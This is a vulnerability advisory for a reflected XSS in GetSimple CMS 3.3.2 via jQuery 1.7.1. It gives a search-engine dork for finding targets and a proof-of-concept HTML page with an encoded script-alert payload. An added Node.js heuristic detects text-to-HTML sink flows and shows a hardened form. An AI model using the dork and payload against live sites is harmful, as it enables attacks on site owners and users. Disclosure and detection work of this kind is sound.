====================================================================================================================================
| # Title     : GetSimple CMS v3.3.2 XSS Vulnerability                                                                             |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            |
| # Vendor    : http://get-simple.info/                                                                                            |
| # Dork      :  © 2009-2014 GetSimple CMS – Version 3.3.2                                                                         |
====================================================================================================================================

PoC:

[+] Dork in Google or another search engine.

[+] Line 5: set your target.

[+] XSS Reflected - jQuery v1.7.1:

<html>
<head>
  <meta charset="utf-8">
  <title>XSS Reflected - Jquery v1.7.1 </title>
  <script src="http://127.0.0.1/GetSimpleCMS/admin/template/js/jquery.min.js"></script>
  <script>
    $(function() {
      $('#users').each(function() {
        var select = $(this);
        var option = select.children('option').first();
        select.after(option.text());
        select.hide();
      });
    });
  </script>
</head>
 
 
<body>
  <form method="post">
    <p>
      <select id="users" name="users">
        <option value="xssreflected">&lt;script&gt;alert(&#x27;xss reflected - jquery v1.7.1 by - indoushka thnx to @firebitsbr - mauro.risonho@gmail.com&#x27;);&lt;/script&gt;</option>
      </select>
    </p>
  </form>
</body>
</html>
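
The handler above reads an option's text with .text() and passes that string to .after(), which parses string arguments as HTML. As an added example (not part of the original advisory), this Node.js script is a line-based heuristic that flags that source-to-sink flow in JavaScript source. The function names, the source and sink lists and the sample snippets are constructed for illustration, and the createTextNode rewrite is one possible hardened form.

```javascript
// Added example (not from the advisory): heuristic line-based check, not a full parser.
// Sources return DOM text; sinks are jQuery methods that parse a string argument as HTML.
const TEXT_SOURCES = /\.(?:text|val)\(\s*\)/;
const HTML_SINK = /\.(after|before|append|prepend|html|replaceWith)\(([^;]*)\)\s*;/;
const ASSIGNMENT = /(?:var|let|const)\s+([A-Za-z_$][\w$]*)\s*=\s*([^;]+);/;
const TEXT_NODE_WRAP = /^\s*document\.createTextNode\(/;

// True when the expression reads DOM text directly or through a tainted variable.
function carriesDomText(expr, tainted) {
  if (TEXT_SOURCES.test(expr)) return true;
  const withoutStrings = expr.replace(/(['"]).*?\1/g, '');
  const identifiers = withoutStrings.match(/[A-Za-z_$][\w$]*/g) || [];
  return identifiers.some((name) => tainted.has(name));
}

// Returns one finding per line where DOM text reaches an HTML-parsing sink.
function findTextToHtmlFlows(source) {
  const tainted = new Set();
  const findings = [];
  source.split('\n').forEach((line, index) => {
    const assignment = ASSIGNMENT.exec(line);
    if (assignment && carriesDomText(assignment[2], tainted)) tainted.add(assignment[1]);
    const sink = HTML_SINK.exec(line);
    // A Text node argument is inserted as text, so it is not reported.
    if (!sink || TEXT_NODE_WRAP.test(sink[2])) return;
    if (carriesDomText(sink[2], tainted)) {
      findings.push({ line: index + 1, sink: sink[1], code: line.trim() });
    }
  });
  return findings;
}

// Constructed samples: the advisory's handler, a variant via a variable, a hardened form.
const ADVISORY_HANDLER = [
  "var select = $(this);",
  "var option = select.children('option').first();",
  "select.after(option.text());",
  "select.hide();",
].join('\n');
const VARIABLE_VARIANT = [
  "var label = $('#users option').first().text();",
  "$('#users').after(label);",
].join('\n');
const HARDENED_HANDLER = [
  "var option = select.children('option').first();",
  "select.after(document.createTextNode(option.text()));",
].join('\n');

console.log(findTextToHtmlFlows(ADVISORY_HANDLER));
```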

Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |
=======================================================================================================================================